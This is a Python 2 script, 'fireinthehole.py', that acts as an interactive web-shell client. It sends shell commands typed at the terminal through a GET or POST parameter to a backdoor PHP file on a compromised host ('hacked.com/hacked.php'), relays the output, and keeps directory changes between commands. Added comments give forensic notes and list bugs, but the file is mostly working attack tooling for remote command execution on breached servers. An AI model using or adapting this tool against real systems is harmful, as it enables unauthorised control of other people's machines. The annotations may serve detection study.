#!/usr/bin/python
#
# Malformation's Interactive HTTP GET and POST Shell - fireinthehole.py
#
# Upload something like this to a php file:
#
# (the example server-side snippet is missing from this copy of the file)
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.
#
# Python 2 script (print statement, raw_input). It is a thin interactive
# front-end that builds a `curl` command line from terminal input and runs it
# through os.popen(), echoing whatever the remote endpoint returns.
#
# Forensics / detection notes (grounded in the code below):
#   - Every session is appended to ./fireinthehole.txt in the current working
#     directory: the host, each command typed, and every line of response.
#     That file is a local artifact of the tool's use.
#   - curl is invoked only with -s (and -d for POST); no -A/-H options are
#     passed, so requests carry curl's default headers.
#   - The typed command, with "; " appended and any earlier "cd " commands
#     prefixed to it, is sent verbatim as the value of the chosen GET query
#     parameter or POST field.

import sys, os, time   # `time` is imported but never used below

print '''
Malformation's Interactive HTTP GET and POST Shell
Version - 1.0.0a

Tries to maintain current working directory when you use 'cd'.

Usage:
\tEnter the host => hacked.com/hacked.php
\tEnter the POST variable => cmd
\thacked.com/hacked.php# ls -la
\ttotal 12880
\tdrwxr-xr-x 2 web web 4096 2009-11-03 11:54 .
\tdrwxr-xr-x 15 root root 4096 2009-10-08 13:37 ..
\t-rw-r--r-- 1 web web 481 2009-11-02 18:58 hacked.php
\thacked.com/hacked.php# .
\tBye.
'''

# # # # # Configuration # # # # # #
#
# 0 to turn off curl verbosity
# (More precisely: 1 echoes the assembled curl command line to the terminal
# before it is run. It does not change curl's own flags; curl is always
# invoked with -s.)
#
debug = 1
#
# # # # # # # # # # # # # # # # # #

write = 0          # set to 1 once fireinthehole.txt has been opened for writing
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]   # directories probed for a curl binary
curl_dirs = ""     # space-separated list of the directories probed, for the error message
count = 0          # how many of those directories contain "curl"
finalcommand = ""  # per-iteration buffer: accumulated "cd " prefixes + current command
dir_array = []     # every "cd ..." command typed so far, in order

# Locate curl by checking for a file literally named "curl" in each candidate
# directory. Only existence is tested, not executability; PATH is not consulted.
for i in range(0,len(curl_array)):
    if (os.path.exists(curl_array[i] + "curl")):
        count = count + 1
    curl_dirs = curl_dirs + curl_array[i] + " "

if (count == 0):
    print "Couldn't find curl. Tried looking in " + curl_dirs
    sys.exit(0)

# Open the session transcript in the current working directory (append if it
# already exists). `file` shadows the Python 2 builtin of the same name and is
# never explicitly closed; it is left to interpreter exit.
try:
    if (os.path.exists("fireinthehole.txt")):
        file = open("fireinthehole.txt","a")
    else:
        file = open("fireinthehole.txt","w")
    print "Output will be saved to fireinthehole.txt"
    write = 1
except IOError:
    print "Directory not writable, output will not be saved."

try:
    host = raw_input("Enter the host => ")
    method = raw_input("GET/POST => ")
    # Method comparison is exact and case-sensitive; anything other than
    # "GET"/"POST" falls through to sys.exit(0). NOTE: that SystemExit is
    # raised inside this try block and, on Python 2.5+, is caught by the bare
    # `except:` at the bottom, so "Unhandled exception" is printed first.
    if (method == "GET"):
        myvar = raw_input("Enter the GET variable => ")
    elif (method == "POST"):
        myvar = raw_input("Enter the POST variable => ")
    else:
        sys.exit(0)
    while True:
        mycommand = raw_input(host + "# ")
        finalcommand = ""
        if (mycommand == "."):
            print "Bye."
            # Same caveat as above: this SystemExit is swallowed by the bare
            # `except:` below before the process actually exits.
            sys.exit(0)
        mycommand = mycommand + "; "
        # Character-by-character check for a leading "cd ". After the "; "
        # suffix an empty input is only two characters long, so
        # mycommand[2] raises IndexError here, which the bare `except:`
        # reports as "Unhandled exception" and exits.
        if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
            # insert() at len+1 is past the end, so this behaves like append().
            # "cd" commands are remembered, echoed (when debug == 1) but NOT
            # sent; they are replayed as a prefix on every later command.
            dir_array.insert(len(dir_array) + 1, mycommand)
            if (method == "GET"):
                string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\""
            else:
                string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
            if (debug == 1):
                print string + ":\n"
            continue
        # Rebuild the command as: all remembered "cd ...; " prefixes, then the
        # command just typed.
        if (len(dir_array) != 0):
            for j in range(0,len(dir_array)):
                finalcommand = finalcommand + dir_array[j]
            finalcommand = finalcommand + mycommand
        if (finalcommand != ""):
            mycommand = finalcommand
        # The curl command line is assembled by plain string concatenation:
        # no URL-encoding of the GET query value and no shell quoting beyond
        # the surrounding double quotes, so the command is handed to the
        # local shell via os.popen() exactly as typed.
        if (method == "GET"):
            string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + "\""
        else:
            string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
        if (debug == 1):
            print string + ":\n"
        command = os.popen(string,"r")
        if (write == 1):
            file.write(host + "# " + mycommand + "\n")
        # Relay curl's stdout line by line to the terminal and the transcript.
        # Reading stops at the first blank line (after strip()), which also
        # means a blank line in the middle of a response ends the relay early
        # and the pipe is never explicitly closed.
        while(1):
            line = command.readline()
            line = line.strip()
            if line:
                print line
                if (write == 1):
                    file.write(line + "\n")
            else:
                break
except KeyboardInterrupt:
    print "\nBye."
    sys.exit(0)
except:
    # Bare except: catches everything, including the SystemExit raised by the
    # sys.exit(0) calls inside the try block (see notes above).
    print "Unhandled exception"
    sys.exit(0)